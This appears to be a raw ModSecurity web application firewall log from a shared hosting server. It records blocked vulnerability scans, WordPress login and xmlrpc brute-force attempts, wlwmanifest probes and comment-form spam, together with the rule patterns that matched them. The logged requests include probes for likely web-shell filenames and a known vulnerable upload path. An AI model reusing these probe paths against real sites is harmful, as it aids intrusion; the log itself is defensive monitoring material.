[Tue May 26 18:51:27.329744 2026] [security2:error] [pid 1036960:tid 1037145] [client 45.134.225.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWeV4GNKXNii6nttH9L9QAAALw"], referer: https://www.google.com/
[Tue May 26 18:51:27.382536 2026] [security2:error] [pid 1036960:tid 1037176] [client 144.31.188.34:48070] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeV4GNKXNii6nttH9L9wAAANs"]
[Tue May 26 18:51:27.438652 2026] [security2:error] [pid 1036960:tid 1037176] [client 144.31.188.34:48070] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeV4GNKXNii6nttH9L9wAAANs"]
[Tue May 26 18:51:27.440672 2026] [security2:error] [pid 1036960:tid 1037138] [client 191.232.213.243:2064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/m7rpo0.php"] [unique_id "ahWeV4GNKXNii6nttH9L-gAAALU"]
[Tue May 26 18:51:27.440816 2026] [security2:error] [pid 1036960:tid 1037138] [client 191.232.213.243:2064] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/m7rpo0.php"] [unique_id "ahWeV4GNKXNii6nttH9L-gAAALU"]
[Tue May 26 18:51:27.806968 2026] [security2:error] [pid 1036960:tid 1037102] [client 191.232.213.243:7556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWeV4GNKXNii6nttH9MBwAAAJE"]
[Tue May 26 18:51:27.807077 2026] [security2:error] [pid 1036960:tid 1037102] [client 191.232.213.243:7556] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWeV4GNKXNii6nttH9MBwAAAJE"]
[Tue May 26 18:51:28.050011 2026] [security2:error] [pid 1036960:tid 1036997] [remote 47.128.99.96:53994] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/tag/news/"] [unique_id "ahWeWIGNKXNii6nttH9MCgAA1SQ"]
[Tue May 26 18:51:28.175116 2026] [security2:error] [pid 1036960:tid 1037118] [client 191.232.213.243:12507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/dr.php"] [unique_id "ahWeWIGNKXNii6nttH9MDwAAAKE"]
[Tue May 26 18:51:28.175205 2026] [security2:error] [pid 1036960:tid 1037118] [client 191.232.213.243:12507] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/dr.php"] [unique_id "ahWeWIGNKXNii6nttH9MDwAAAKE"]
[Tue May 26 18:51:28.207689 2026] [security2:error] [pid 1036960:tid 1037184] [client 144.31.188.34:48080] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeWIGNKXNii6nttH9MEAAAAOM"]
[Tue May 26 18:51:28.260128 2026] [security2:error] [pid 1036960:tid 1037184] [client 144.31.188.34:48080] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeWIGNKXNii6nttH9MEAAAAOM"]
[Tue May 26 18:51:28.531942 2026] [security2:error] [pid 1036960:tid 1037107] [client 191.232.213.243:2095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/7gt.php"] [unique_id "ahWeWIGNKXNii6nttH9MHQAAAJY"]
[Tue May 26 18:51:28.532037 2026] [security2:error] [pid 1036960:tid 1037107] [client 191.232.213.243:2095] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/7gt.php"] [unique_id "ahWeWIGNKXNii6nttH9MHQAAAJY"]
[Tue May 26 18:51:28.744839 2026] [security2:error] [pid 1036960:tid 1037147] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeWIGNKXNii6nttH9MFwAAAL4"]
[Tue May 26 18:51:28.900490 2026] [security2:error] [pid 1036960:tid 1037140] [client 191.232.213.243:2092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/2468.php"] [unique_id "ahWeWIGNKXNii6nttH9MLAAAALc"]
[Tue May 26 18:51:28.900593 2026] [security2:error] [pid 1036960:tid 1037140] [client 191.232.213.243:2092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/2468.php"] [unique_id "ahWeWIGNKXNii6nttH9MLAAAALc"]
[Tue May 26 18:51:29.026296 2026] [security2:error] [pid 1036960:tid 1037116] [client 144.31.188.34:48086] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeWYGNKXNii6nttH9MLwAAAJ8"]
[Tue May 26 18:51:29.075157 2026] [security2:error] [pid 1036960:tid 1037116] [client 144.31.188.34:48086] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeWYGNKXNii6nttH9MLwAAAJ8"]
[Tue May 26 18:51:29.259927 2026] [security2:error] [pid 1036960:tid 1037096] [client 191.232.213.243:2055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/s2.php"] [unique_id "ahWeWYGNKXNii6nttH9MOgAAAIs"]
[Tue May 26 18:51:29.260044 2026] [security2:error] [pid 1036960:tid 1037096] [client 191.232.213.243:2055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/s2.php"] [unique_id "ahWeWYGNKXNii6nttH9MOgAAAIs"]
[Tue May 26 18:51:29.614419 2026] [security2:error] [pid 1036960:tid 1037099] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeWYGNKXNii6nttH9MNQAAAI4"]
[Tue May 26 18:51:29.630869 2026] [security2:error] [pid 1036960:tid 1037195] [client 191.232.213.243:2096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/tiny2.php"] [unique_id "ahWeWYGNKXNii6nttH9MRgAAAO4"]
[Tue May 26 18:51:29.630969 2026] [security2:error] [pid 1036960:tid 1037195] [client 191.232.213.243:2096] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/tiny2.php"] [unique_id "ahWeWYGNKXNii6nttH9MRgAAAO4"]
[Tue May 26 18:51:29.838363 2026] [security2:error] [pid 1036960:tid 1037124] [client 144.31.188.34:48098] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeWYGNKXNii6nttH9MUAAAAKc"]
[Tue May 26 18:51:29.882416 2026] [security2:error] [pid 1036960:tid 1037124] [client 144.31.188.34:48098] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeWYGNKXNii6nttH9MUAAAAKc"]
[Tue May 26 18:51:30.002668 2026] [security2:error] [pid 1036960:tid 1037135] [client 191.232.213.243:7585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.213.232.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/asd.php"] [unique_id "ahWeWoGNKXNii6nttH9MUQAAALI"]
[Tue May 26 18:51:30.002808 2026] [security2:error] [pid 1036960:tid 1037135] [client 191.232.213.243:7585] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/asd.php"] [unique_id "ahWeWoGNKXNii6nttH9MUQAAALI"]
[Tue May 26 18:51:30.565099 2026] [security2:error] [pid 1036960:tid 1037016] [remote 103.230.156.120:38830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeWoGNKXNii6nttH9MWwAApDc"]
[Tue May 26 18:51:30.652884 2026] [security2:error] [pid 1036960:tid 1037197] [client 144.31.188.34:48100] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeWoGNKXNii6nttH9MZQAAAPA"]
[Tue May 26 18:51:30.702906 2026] [security2:error] [pid 1036960:tid 1037197] [client 144.31.188.34:48100] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeWoGNKXNii6nttH9MZQAAAPA"]
[Tue May 26 18:51:30.710500 2026] [security2:error] [pid 1036960:tid 1037023] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeWoGNKXNii6nttH9MZgAAxT4"]
[Tue May 26 18:51:30.710709 2026] [security2:error] [pid 1036960:tid 1037154] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeWoGNKXNii6nttH9MZgAAxT4"]
[Tue May 26 18:51:31.473452 2026] [security2:error] [pid 1036960:tid 1037202] [client 144.31.188.34:48108] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeW4GNKXNii6nttH9MfgAAAPU"]
[Tue May 26 18:51:31.522898 2026] [security2:error] [pid 1036960:tid 1037202] [client 144.31.188.34:48108] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeW4GNKXNii6nttH9MfgAAAPU"]
[Tue May 26 18:51:31.892012 2026] [security2:error] [pid 1036960:tid 1037195] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeW4GNKXNii6nttH9MfwAAAO4"]
[Tue May 26 18:51:32.283168 2026] [security2:error] [pid 1036960:tid 1037136] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWeXIGNKXNii6nttH9MiAAAALM"], referer: http://anujtradingco.com/pages/coming-soon/
[Tue May 26 18:51:32.327570 2026] [security2:error] [pid 1036960:tid 1037090] [client 144.31.188.34:48122] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeXIGNKXNii6nttH9MjAAAAIU"]
[Tue May 26 18:51:32.370932 2026] [security2:error] [pid 1036960:tid 1037090] [client 144.31.188.34:48122] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeXIGNKXNii6nttH9MjAAAAIU"]
[Tue May 26 18:51:33.145755 2026] [security2:error] [pid 1036960:tid 1037183] [client 144.31.188.34:57096] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeXYGNKXNii6nttH9MpgAAAOI"]
[Tue May 26 18:51:33.194602 2026] [security2:error] [pid 1036960:tid 1037183] [client 144.31.188.34:57096] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeXYGNKXNii6nttH9MpgAAAOI"]
[Tue May 26 18:51:33.958752 2026] [security2:error] [pid 1036960:tid 1037137] [client 144.31.188.34:57108] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeXYGNKXNii6nttH9MuQAAALQ"]
[Tue May 26 18:51:34.002112 2026] [security2:error] [pid 1036960:tid 1037137] [client 144.31.188.34:57108] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "obinnawrites.com"] [uri "/wp-comments-post.php"] [unique_id "ahWeXYGNKXNii6nttH9MuQAAALQ"]
[Tue May 26 18:51:34.390838 2026] [security2:error] [pid 1036960:tid 1037206] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeXYGNKXNii6nttH9MvAAAAPk"]
[Tue May 26 18:51:35.910900 2026] [security2:error] [pid 1036960:tid 1037148] [client 157.55.39.200:14840] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWeX4GNKXNii6nttH9M6QAAAL8"]
[Tue May 26 18:51:36.109639 2026] [security2:error] [pid 1036960:tid 1037198] [client 193.37.33.148:61897] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWeXoGNKXNii6nttH9MzAAAAPE"]
[Tue May 26 18:51:36.623146 2026] [security2:error] [pid 1036960:tid 1037210] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeYIGNKXNii6nttH9M9gAAAP0"]
[Tue May 26 18:51:36.690791 2026] [security2:error] [pid 1036960:tid 1037211] [client 146.56.204.198:60355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/public/h-ui/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahWeYIGNKXNii6nttH9NCQAAAP4"]
[Tue May 26 18:51:36.742721 2026] [security2:error] [pid 1036960:tid 1037119] [client 85.204.70.104:55770] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWeYIGNKXNii6nttH9NDAAAAKI"]
[Tue May 26 18:51:37.272103 2026] [security2:error] [pid 1036960:tid 1037184] [client 85.204.70.104:55778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "strapptech.com"] [uri "/xmlrpc.php"] [unique_id "ahWeYYGNKXNii6nttH9NFwAAAOM"]
[Tue May 26 18:51:37.705567 2026] [security2:error] [pid 1036960:tid 1037196] [client 85.204.70.104:55790] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWeYYGNKXNii6nttH9NLAAAAO8"]
[Tue May 26 18:51:38.032060 2026] [security2:error] [pid 1036960:tid 1037183] [client 85.204.70.104:55800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWeYoGNKXNii6nttH9NNAAAAOI"]
[Tue May 26 18:51:38.062191 2026] [security2:error] [pid 1036960:tid 1037044] [remote 143.198.203.76:57896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWeYYGNKXNii6nttH9NMwAA7lM"]
[Tue May 26 18:51:38.355395 2026] [security2:error] [pid 1036960:tid 1037167] [client 85.204.70.104:55804] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWeYoGNKXNii6nttH9NPgAAANI"]
[Tue May 26 18:51:38.649424 2026] [security2:error] [pid 1036960:tid 1037143] [client 85.204.70.104:55818] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWeYoGNKXNii6nttH9NTAAAALo"]
[Tue May 26 18:51:38.948456 2026] [security2:error] [pid 1036960:tid 1037121] [client 85.204.70.104:55832] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWeYoGNKXNii6nttH9NUgAAAKQ"]
[Tue May 26 18:51:39.058117 2026] [security2:error] [pid 1036960:tid 1037092] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeYoGNKXNii6nttH9NSwAAAIc"]
[Tue May 26 18:51:39.212730 2026] [security2:error] [pid 1036960:tid 1037200] [client 85.204.70.104:55842] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWeY4GNKXNii6nttH9NWwAAAPM"]
[Tue May 26 18:51:39.470385 2026] [security2:error] [pid 1036960:tid 1037117] [client 85.204.70.104:55848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWeY4GNKXNii6nttH9NaAAAAKA"]
[Tue May 26 18:51:39.753347 2026] [security2:error] [pid 1036960:tid 1037151] [client 85.204.70.104:55858] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWeY4GNKXNii6nttH9NbwAAAMI"]
[Tue May 26 18:51:40.068547 2026] [security2:error] [pid 1036960:tid 1037103] [client 85.204.70.104:55862] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWeZIGNKXNii6nttH9NegAAAJI"]
[Tue May 26 18:51:40.353773 2026] [security2:error] [pid 1036960:tid 1037102] [client 85.204.70.104:55864] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "strapptech.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWeZIGNKXNii6nttH9NggAAAJE"]
